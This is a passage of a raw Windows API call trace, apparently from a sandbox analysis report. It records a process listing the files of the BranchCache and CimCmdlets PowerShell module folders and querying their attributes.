ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0176.838] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheSecondaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0176.838] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 1 [0176.838] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 0 [0176.838] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.839] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0176.839] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", lpFilePart=0x0) returned 0x3f [0176.839] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.840] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.841] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9edf50, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9edf50, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x6c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.format.ps1xml", cAlternateFileName="")) returned 1 [0176.841] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x699, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.psd1", cAlternateFileName="")) returned 1 [0176.841] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x141e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.types.ps1xml", cAlternateFileName="")) returned 1 [0176.841] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheClientSettingData.cdxml", cAlternateFileName="")) returned 1 [0176.841] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheContentServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0176.841] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheHostedCacheServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0176.841] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheNetworkSettingData.cdxml", cAlternateFileName="")) returned 1 [0176.842] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x8a64, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheOrchestrator.cdxml", cAlternateFileName="")) returned 1 [0176.842] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryPublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0176.842] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0176.842] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheSecondaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0176.842] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 1 [0176.842] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.842] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.843] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0176.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0176.843] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0176.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0176.844] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0176.844] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", lpFilePart=0x0) returned 0x3f [0176.844] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5928b0 [0176.845] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.846] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9edf50, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9edf50, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x6c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.format.ps1xml", cAlternateFileName="")) returned 1 [0176.846] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x699, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.psd1", cAlternateFileName="")) returned 1 [0176.846] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x141e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.types.ps1xml", cAlternateFileName="")) returned 1 [0176.846] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheClientSettingData.cdxml", cAlternateFileName="")) returned 1 [0176.846] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheContentServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0176.847] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheHostedCacheServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0176.847] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheNetworkSettingData.cdxml", cAlternateFileName="")) returned 1 [0176.847] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x8a64, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheOrchestrator.cdxml", cAlternateFileName="")) returned 1 [0176.848] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryPublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0176.848] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0176.849] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheSecondaryRepublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0176.850] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 1 [0176.850] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x191, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheStatus.cdxml", cAlternateFileName="")) returned 0 [0176.850] FindClose (in: hFindFile=0x1a5928b0 | out: hFindFile=0x1a5928b0) returned 1 [0176.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0176.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0176.851] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1")) returned 0x20 [0176.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.890] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0176.890] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", lpFilePart=0x0) returned 0x3e [0176.890] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.891] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.891] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 1 [0176.891] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 0 [0176.891] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.891] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", 